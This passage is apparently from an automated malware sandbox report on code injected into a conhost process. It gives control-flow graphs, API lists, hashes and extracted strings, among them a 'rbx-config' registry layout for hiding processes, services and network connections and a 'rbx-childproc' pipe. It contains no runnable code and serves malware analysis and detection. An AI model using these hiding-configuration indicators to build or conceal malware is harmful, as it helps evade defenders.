                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E3199C
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CloseOpen$Heap$AllocProcessSleep
                              • String ID:
                              • API String ID: 948135145-0
                              • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction ID: 76f9dcf75de2643a9e0101d2ae14af3a155aa21ad4ae906ab56445fb544a9feb
                              • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction Fuzzy Hash: A7310A7D200E4389EB589B26D54936933A4AB4ABC2F24543F8E0DC7F96DF34C851C217

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 197 2bcd7e32ff0-2bcd7e33069 199 2bcd7e3306f-2bcd7e33075 197->199 200 2bcd7e33384-2bcd7e333a7 197->200 199->200 201 2bcd7e3307b-2bcd7e3307e 199->201 201->200 202 2bcd7e33084-2bcd7e33087 201->202 202->200 203 2bcd7e3308d-2bcd7e3309d GetModuleHandleA 202->203 204 2bcd7e3309f-2bcd7e330af GetProcAddress 203->204 205 2bcd7e330b1 203->205 206 2bcd7e330b4-2bcd7e330d2 204->206 205->206 206->200 208 2bcd7e330d8-2bcd7e330f7 StrCmpNIW 206->208 208->200 209 2bcd7e330fd-2bcd7e33101 208->209 209->200 210 2bcd7e33107-2bcd7e33111 209->210 210->200 211 2bcd7e33117-2bcd7e3311e 210->211 211->200 212 2bcd7e33124-2bcd7e33137 211->212 213 2bcd7e33147 212->213 214 2bcd7e33139-2bcd7e33145 212->214 215 2bcd7e3314a-2bcd7e3314e 213->215 214->215 216 2bcd7e3315e 215->216 217 2bcd7e33150-2bcd7e3315c 215->217 218 2bcd7e33161-2bcd7e3316b 216->218 217->218 219 2bcd7e33251-2bcd7e33255 218->219 220 2bcd7e33171-2bcd7e33174 218->220 221 2bcd7e33376-2bcd7e3337e 219->221 222 2bcd7e3325b-2bcd7e3325e 219->222 223 2bcd7e33186-2bcd7e33190 220->223 224 2bcd7e33176-2bcd7e33183 call 2bcd7e31a30 220->224 221->200 221->212 225 2bcd7e3326f-2bcd7e33279 222->225 226 2bcd7e33260-2bcd7e3326c call 2bcd7e31a30 222->226 228 2bcd7e33192-2bcd7e3319f 223->228 229 2bcd7e331c4-2bcd7e331ce 223->229 224->223 233 2bcd7e3327b-2bcd7e33288 225->233 234 2bcd7e332a9-2bcd7e332ac 225->234 226->225 228->229 236 2bcd7e331a1-2bcd7e331ae 228->236 230 2bcd7e331fe-2bcd7e33201 229->230 231 2bcd7e331d0-2bcd7e331dd 229->231 240 2bcd7e3320f-2bcd7e3321c lstrlenW 230->240 241 2bcd7e33203-2bcd7e3320d call 2bcd7e31cc4 230->241 231->230 238 2bcd7e331df-2bcd7e331ec 231->238 233->234 242 2bcd7e3328a-2bcd7e33297 233->242 243 2bcd7e332ae-2bcd7e332b7 call 2bcd7e31cc4 234->243 244 2bcd7e332b9-2bcd7e332c6 lstrlenW 234->244 237 2bcd7e331b1-2bcd7e331b7 236->237 245 2bcd7e331bd-2bcd7e331c2 237->245 246 2bcd7e33247-2bcd7e3324c 237->246 249 2bcd7e331ef-2bcd7e331f5 238->249 252 2bcd7e3322f-2bcd7e33241 call 2bcd7e33f88 240->252 253 2bcd7e3321e-2bcd7e3322d call 2bcd7e31cfc 240->253 241->240 241->246 251 2bcd7e3329a-2bcd7e332a0 242->251 243->244 262 2bcd7e332ee-2bcd7e332f9 243->262 247 2bcd7e332d9-2bcd7e332e3 call 2bcd7e33f88 244->247 248 2bcd7e332c8-2bcd7e332d7 call 2bcd7e31cfc 244->248 245->229 245->237 257 2bcd7e332e6-2bcd7e332e8 246->257 247->257 248->247 248->262 249->246 260 2bcd7e331f7-2bcd7e331fc 249->260 251->262 263 2bcd7e332a2-2bcd7e332a7 251->263 252->246 252->257 253->246 253->252 257->221 257->262 260->230 260->249 268 2bcd7e33370-2bcd7e33374 262->268 269 2bcd7e332fb-2bcd7e332ff 262->269 263->234 263->251 268->221 271 2bcd7e33301-2bcd7e33305 269->271 272 2bcd7e33307-2bcd7e33321 call 2bcd7e43a40 269->272 271->272 273 2bcd7e33324-2bcd7e33327 271->273 272->273 275 2bcd7e3334a-2bcd7e3334d 273->275 276 2bcd7e33329-2bcd7e33347 call 2bcd7e43a40 273->276 275->268 279 2bcd7e3334f-2bcd7e3336d call 2bcd7e43a40 275->279 276->275 279->268
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                              • API String ID: 2119608203-3850299575
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: 6c217d941e872c5fa1b4bdacac765491dbe85fcb64c7f565251486349f525500
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: DFB1C93A210A928AEB64CF25D408BA9B3A4F744B85F64503FEE1957FA6DF35CD84C341
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction ID: 23f298a0121f5664ab260fffd6e15b24096aa1bfc7e4c172a7310a83b9ca8a39
                              • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction Fuzzy Hash: DA31277A205B818AEB608F60E8443EA7364F784748F64413FDA4E47F99DF38C658C711
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction ID: 371539b8e06e030ce6ce371ba05d1e919cdab070135ed372a556fc6e640a6b89
                              • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction Fuzzy Hash: 2641733A214B818AE760CF25E8443AE73A4F788758F60023BEA8D47F98DF38C555CB01
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction ID: 2292e717bda1cb51af59dd0755a0791be3ddbc97c6a82045c8a77e3c6a35d091
                              • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction Fuzzy Hash: 5DA1F5367146824DFB20DB75A8883AD7BA1E781B95F64413FDE9827F99CB3AC441C702

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: 9123ef5016a16d6e93a775046e3d0dedcf023e30e2aedd2674ac46ebb93bfb99
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: 6C71183A210F5289EB209F25E85969833A5FB89B8DF60113EDE4D87F28EF34C454C781

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction ID: 6043c043b50d77eae62dc2f412fe0c357a18dced22793f83868f9adb75034ea5
                              • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction Fuzzy Hash: 44515A36600B859AE720CF62E84935AB7A1F789F99F64413EDE4947B18EF3CC059C741

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                              • API String ID: 740688525-1880043860
                              • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction ID: 1f7f6d952bf2f5faaf73dc81f8a8be130030cbc32d3845c6569f57b62c485a46
                              • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction Fuzzy Hash: 5D51C33A70170659EA149B56A8083A57390BB48BB9FA8073F9E3D07FD1EF38D455C742

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Running Time
                              • API String ID: 1943346504-1805530042
                              • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction ID: 3caeded21bc9947aeec7a14594077d13e82a28317acb15a83f14b0693847c382
                              • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction Fuzzy Hash: 68318236A00A429AF721DF12A808759B3A1F788BDAF64453E9E4947F35DF38C455C741

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Utilization Percentage
                              • API String ID: 1943346504-3507739905
                              • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction ID: 0802601ce66cd945419439b3df121fce96515b8c16b28663905edabf7c4102ed
                              • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction Fuzzy Hash: 6C316B3AA10B429EEB10DF22A888B5977A0B784F99F64413F9E4A43F35EF38C455C741

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 313 2bcd7e3a22c-2bcd7e3a294 call 2bcd7e3b144 316 2bcd7e3a6f5-2bcd7e3a6fb call 2bcd7e3c388 313->316 317 2bcd7e3a29a-2bcd7e3a29d 313->317 317->316 318 2bcd7e3a2a3-2bcd7e3a2a9 317->318 321 2bcd7e3a2af-2bcd7e3a2b3 318->321 322 2bcd7e3a378-2bcd7e3a38a 318->322 321->322 325 2bcd7e3a2b9-2bcd7e3a2c4 321->325 323 2bcd7e3a390-2bcd7e3a394 322->323 324 2bcd7e3a645-2bcd7e3a649 322->324 323->324 328 2bcd7e3a39a-2bcd7e3a3a5 323->328 326 2bcd7e3a682-2bcd7e3a68c call 2bcd7e39324 324->326 327 2bcd7e3a64b-2bcd7e3a652 324->327 325->322 329 2bcd7e3a2ca-2bcd7e3a2cf 325->329 326->316 341 2bcd7e3a68e-2bcd7e3a6ad call 2bcd7e38070 326->341 327->316 331 2bcd7e3a658-2bcd7e3a67d call 2bcd7e3a6fc 327->331 328->324 333 2bcd7e3a3ab-2bcd7e3a3af 328->333 329->322 330 2bcd7e3a2d5-2bcd7e3a2df call 2bcd7e39324 329->330 330->341 344 2bcd7e3a2e5-2bcd7e3a310 call 2bcd7e39324 * 2 call 2bcd7e39a0c 330->344 331->326 334 2bcd7e3a575-2bcd7e3a581 333->334 335 2bcd7e3a3b5-2bcd7e3a3f0 call 2bcd7e39704 333->335 334->326 342 2bcd7e3a587-2bcd7e3a58b 334->342 335->334 349 2bcd7e3a3f6-2bcd7e3a3ff 335->349 346 2bcd7e3a58d-2bcd7e3a599 call 2bcd7e399cc 342->346 347 2bcd7e3a59b-2bcd7e3a5a3 342->347 380 2bcd7e3a312-2bcd7e3a316 344->380 381 2bcd7e3a330-2bcd7e3a33a call 2bcd7e39324 344->381 346->347 357 2bcd7e3a5bc-2bcd7e3a5c4 346->357 347->326 348 2bcd7e3a5a9-2bcd7e3a5b6 call 2bcd7e395a4 347->348 348->326 348->357 355 2bcd7e3a403-2bcd7e3a435 349->355 359 2bcd7e3a43b-2bcd7e3a447 355->359 360 2bcd7e3a568-2bcd7e3a56f 355->360 362 2bcd7e3a5ca-2bcd7e3a5ce 357->362 363 2bcd7e3a6d8-2bcd7e3a6f4 call 2bcd7e39324 * 2 call 2bcd7e3c2f4 357->363 359->360 364 2bcd7e3a44d-2bcd7e3a46c 359->364 360->334 360->355 366 2bcd7e3a5e1 362->366 367 2bcd7e3a5d0-2bcd7e3a5df call 2bcd7e399cc 362->367 363->316 368 2bcd7e3a472-2bcd7e3a4af call 2bcd7e399e0 * 2 364->368 369 2bcd7e3a558-2bcd7e3a55d 364->369 376 2bcd7e3a5e3-2bcd7e3a5ed call 2bcd7e3b1dc 366->376 367->376 394 2bcd7e3a4e2-2bcd7e3a4e5 368->394 369->360 376->326 391 2bcd7e3a5f3-2bcd7e3a643 call 2bcd7e39634 call 2bcd7e39838 376->391 380->381 385 2bcd7e3a318-2bcd7e3a323 380->385 381->322 393 2bcd7e3a33c-2bcd7e3a35c call 2bcd7e39324 * 2 call 2bcd7e3b1dc 381->393 385->381 390 2bcd7e3a325-2bcd7e3a32a 385->390 390->316 390->381 391->326 418 2bcd7e3a35e-2bcd7e3a368 call 2bcd7e3b2cc 393->418 419 2bcd7e3a373 393->419 399 2bcd7e3a4b1-2bcd7e3a4d7 call 2bcd7e399e0 call 2bcd7e3a96c 394->399 400 2bcd7e3a4e7-2bcd7e3a4ee 394->400 414 2bcd7e3a4f9-2bcd7e3a556 call 2bcd7e3a158 399->414 415 2bcd7e3a4d9-2bcd7e3a4dc 399->415 403 2bcd7e3a55f 400->403 404 2bcd7e3a4f0-2bcd7e3a4f4 400->404 408 2bcd7e3a564 403->408 404->368 408->360 414->408 415->394 423 2bcd7e3a36e-2bcd7e3a6d1 call 2bcd7e38f84 call 2bcd7e3ad28 call 2bcd7e39178 418->423 424 2bcd7e3a6d2-2bcd7e3a6d7 call 2bcd7e3c2f4 418->424 419->322 423->424 424->363
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction ID: 365f5137e85308b0a15eb217e65687ba24d9c7d08530c0caaa083e4f7ad03142
                              • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction Fuzzy Hash: 16D18D7A604B818EEB20EF66D4483AD77A4F745799F20013BEE8957F96DB38C490C702
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction ID: 55074a64cf958c4804fdd03884f51e2de301ee65d3555530f4197b87262e1baa
                              • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction Fuzzy Hash: C7D19F3A6047828EEB60DF65D48C3AD77A4F755788F24023AEE8957F9ADB34C091C702

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 434 2bcd7e3104c-2bcd7e310b9 RegQueryInfoKeyW 435 2bcd7e310bf-2bcd7e310c9 434->435 436 2bcd7e311b5-2bcd7e311d0 434->436 435->436 437 2bcd7e310cf-2bcd7e3111f RegEnumValueW 435->437 438 2bcd7e311a5-2bcd7e311af 437->438 439 2bcd7e31125-2bcd7e3112a 437->439 438->436 438->437 439->438 440 2bcd7e3112c-2bcd7e31135 439->440 441 2bcd7e31147-2bcd7e3114c 440->441 442 2bcd7e31137 440->442 444 2bcd7e3114e-2bcd7e31193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->444 445 2bcd7e31199-2bcd7e311a3 441->445 443 2bcd7e3113b-2bcd7e3113f 442->443 443->438 446 2bcd7e31141-2bcd7e31145 443->446 444->445 445->438 446->441 446->443
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction ID: 31c12e656c52d2f433d12936568b295b0e9ce996a54b8e2677b47d3da47a5297
                              • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction Fuzzy Hash: 8D417B37214B81DAE760CF21E44839A77B1F389B99F54813EDA8947B58DF38C489CB41

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                              • String ID: \\.\pipe\$rbx-childproc
                              • API String ID: 166002920-1828357524
                              • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction ID: 7e06337903e75c23e37c12ad2a0d2cc9037f5e2f7b3715832d5a26173bb0f8cd
                              • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction Fuzzy Hash: A4113A3A614B4186E7108B21F41D35A7760F389B99FA4023AEA9902FA8DF7CC154CB82

                              Control-flow Graph

                              • Executed
                              • Not Executed
